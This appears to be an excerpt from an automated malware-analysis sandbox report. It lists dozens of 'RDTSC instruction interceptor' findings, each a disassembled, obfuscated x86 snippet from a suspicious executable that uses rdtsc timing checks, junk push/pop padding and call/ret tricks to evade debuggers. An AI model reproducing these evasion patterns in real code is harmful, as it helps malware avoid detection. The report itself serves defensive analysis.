                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4CED second address: AF4D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d nop 0x0000000e sub dword ptr [ebp+122D3334h], esi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F33B8C742F8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov eax, dword ptr [ebp+122D12E9h] 0x00000042 mov dword ptr [ebp+124730E8h], esi 0x00000048 push FFFFFFFFh 0x0000004a mov bh, DBh 0x0000004c nop 0x0000004d jo 00007F33B8C74304h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF4D4A second address: AF4D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6B72 second address: AF6BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F33B8C74309h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F33B8C74308h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F33B8C742F8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov bh, cl 0x0000002f push 00000000h 0x00000031 xor dword ptr [ebp+122D1CABh], edx 0x00000037 push eax 0x00000038 push ecx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8B7B second address: AF8B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8D4C second address: AF8D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8E0F second address: AF8E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFADAB second address: AFADB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33B8C742F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8E13 second address: AF8E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8E19 second address: AF8E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFADB5 second address: AFAE33 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F33B8517E9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jno 00007F33B8517E98h 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F33B8517E9Eh 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov edi, dword ptr [ebp+122D27CEh] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F33B8517E98h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d or edi, dword ptr [ebp+122D28BEh] 0x00000053 mov eax, dword ptr [ebp+122D167Dh] 0x00000059 push FFFFFFFFh 0x0000005b stc 0x0000005c nop 0x0000005d pushad 0x0000005e jnc 00007F33B8517E9Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCC9B second address: AFCD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FDh 0x00000009 popad 0x0000000a jbe 00007F33B8C7430Fh 0x00000010 jmp 00007F33B8C74309h 0x00000015 popad 0x00000016 push eax 0x00000017 jno 00007F33B8C74305h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F33B8C742F8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F33B8C742F8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 add dword ptr [ebp+122D347Eh], ebx 0x0000005a push 00000000h 0x0000005c movzx edi, cx 0x0000005f xchg eax, esi 0x00000060 jc 00007F33B8C74300h 0x00000066 push eax 0x00000067 push edx 0x00000068 push ecx 0x00000069 pop ecx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8E1F second address: AF8E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFE89 second address: AFFE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFE8D second address: AFFE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFE93 second address: AFFE98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01E24 second address: B01E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01E2A second address: B01E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0244D second address: B024FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F33B8517E98h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 je 00007F33B8517EA6h 0x0000002e jmp 00007F33B8517EA0h 0x00000033 jmp 00007F33B8517E9Ah 0x00000038 call 00007F33B8517E9Ah 0x0000003d add dword ptr [ebp+122D1BADh], esi 0x00000043 pop ebx 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007F33B8517E98h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 add bl, FFFFFFBFh 0x00000063 xchg eax, esi 0x00000064 jmp 00007F33B8517E9Ch 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F33B8517E9Eh 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03433 second address: B03439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03439 second address: B0348A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+124692B6h], edx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 add eax, dword ptr [ebp+122D27C6h] 0x0000001c sub dword ptr [ebp+122D2B5Bh], ecx 0x00000022 popad 0x00000023 push 00000000h 0x00000025 jmp 00007F33B8517EA9h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F33B8517E9Fh 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04646 second address: B0464A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0464A second address: B04656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B057B6 second address: B057BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDF4D second address: AFDF65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFDF65 second address: AFE002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C742FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D228Bh] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F33B8C742F8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 sbb bh, FFFFFFA3h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F33B8C742F8h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov eax, dword ptr [ebp+122D0225h] 0x0000005d or dword ptr [ebp+122D1858h], edi 0x00000063 jmp 00007F33B8C74303h 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+122D31BAh], ebx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F33B8C742FCh 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEF52 second address: AFEF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F33B8517E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEF5C second address: AFEF60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFFB1 second address: AFFFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F33B8517E9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFFFC0 second address: B00057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F33B8C74308h 0x0000000b jl 00007F33B8C74304h 0x00000011 pushad 0x00000012 jns 00007F33B8C742F6h 0x00000018 mov dword ptr [ebp+122D3362h], edi 0x0000001e popad 0x0000001f push dword ptr fs:[00000000h] 0x00000026 xor di, 4643h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bx, 8EE9h 0x00000036 mov eax, dword ptr [ebp+122D0FB9h] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F33B8C742F8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, 51C12B01h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F33B8C74309h 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02728 second address: B0272C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0272C second address: B0274D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F33B8C74309h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0274D second address: B02751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B036D0 second address: B036F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F33B8C74308h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0D484 second address: B0D488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127C2 second address: B127C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127C8 second address: B127CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127CC second address: B127D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127D8 second address: B127DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B127DE second address: B127F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74302h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1489B second address: 931A1A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 24586E06h 0x00000012 jmp 00007F33B8517EA7h 0x00000017 push dword ptr [ebp+122D00C9h] 0x0000001d js 00007F33B8517E97h 0x00000023 call dword ptr [ebp+122D3209h] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov ecx, dword ptr [ebp+122D27EEh] 0x00000031 mov dword ptr [ebp+122D21EAh], eax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a pushad 0x0000003b mov dword ptr [ebp+122D21EAh], esi 0x00000041 or ch, FFFFFFF7h 0x00000044 popad 0x00000045 mov dword ptr [ebp+122D21EAh], edx 0x0000004b mov edx, dword ptr [esp+28h] 0x0000004f jmp 00007F33B8517EA7h 0x00000054 jmp 00007F33B8517EA0h 0x00000059 mov dword ptr [ebp+122D28CAh], eax 0x0000005f add dword ptr [ebp+122D30DDh], ecx 0x00000065 mov esi, 0000003Ch 0x0000006a jo 00007F33B8517E9Ch 0x00000070 mov dword ptr [ebp+122D21EAh], edi 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a cld 0x0000007b lodsw 0x0000007d pushad 0x0000007e jbe 00007F33B8517E9Ch 0x00000084 jng 00007F33B8517E96h 0x0000008a ja 00007F33B8517E9Ch 0x00000090 popad 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 cld 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a add dword ptr [ebp+122D3245h], eax 0x000000a0 push eax 0x000000a1 pushad 0x000000a2 jne 00007F33B8517E9Ch 0x000000a8 push eax 0x000000a9 push edx 0x000000aa jl 00007F33B8517E96h 0x000000b0 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3F62 second address: AA3F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8C74307h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1915F second address: B19163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19163 second address: B19179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F33B8C742F6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19422 second address: B1943B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F33B8517E96h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jp 00007F33B8517E96h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B195C4 second address: B195C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19854 second address: B19862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517E9Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B199D5 second address: B19A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74305h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F33B8C74303h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19C59 second address: B19C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20AA3 second address: B20AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20AA7 second address: B20AB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20AB1 second address: B20ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F33B8C742F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25163 second address: B25169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25169 second address: B25172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B25172 second address: B251D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F33B8517E9Fh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F33B8517EA4h 0x00000015 jmp 00007F33B8517EA1h 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d je 00007F33B8517EB4h 0x00000023 js 00007F33B8517E96h 0x00000029 jmp 00007F33B8517EA8h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B251D8 second address: B251E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8C742FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23FE6 second address: B23FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2D95 second address: AF2D9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2D9B second address: AF2DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2DA1 second address: AF2DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2E7D second address: AF2E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF325C second address: AF327D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 add dword ptr [esp], 715CA8E1h 0x0000000d mov dword ptr [ebp+122D2246h], edx 0x00000013 call 00007F33B8C742F9h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF342A second address: AF3430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF36FD second address: AF371D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF371D second address: AF3727 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3727 second address: AF3782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8C74300h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ecx, dword ptr [ebp+122D321Fh] 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F33B8C742F8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dx, ax 0x00000033 mov edi, 3BABD55Dh 0x00000038 nop 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F33B8C742FBh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3B9F second address: AF3BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3BA5 second address: AF3BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8C742FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3DDC second address: AF3DE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3DE0 second address: AF3E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+12455B72h], esi 0x00000010 adc edi, 6D9226BAh 0x00000016 lea eax, dword ptr [ebp+12494AE2h] 0x0000001c jmp 00007F33B8C742FFh 0x00000021 mov edi, dword ptr [ebp+122D2275h] 0x00000027 push eax 0x00000028 jmp 00007F33B8C74300h 0x0000002d mov dword ptr [esp], eax 0x00000030 mov edi, dword ptr [ebp+122D27EAh] 0x00000036 lea eax, dword ptr [ebp+12494A9Eh] 0x0000003c mov dl, bh 0x0000003e xor dword ptr [ebp+122D2778h], ebx 0x00000044 nop 0x00000045 push ecx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3E3E second address: ACC599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007F33B8517E9Dh 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F33B8517E98h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b xor dx, 4CE1h 0x00000030 call dword ptr [ebp+122D2CBAh] 0x00000036 jmp 00007F33B8517EA9h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F33B8517EA3h 0x00000042 push eax 0x00000043 push edx 0x00000044 jno 00007F33B8517E96h 0x0000004a jnc 00007F33B8517E96h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC599 second address: ACC5C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74305h 0x00000007 jmp 00007F33B8C74301h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
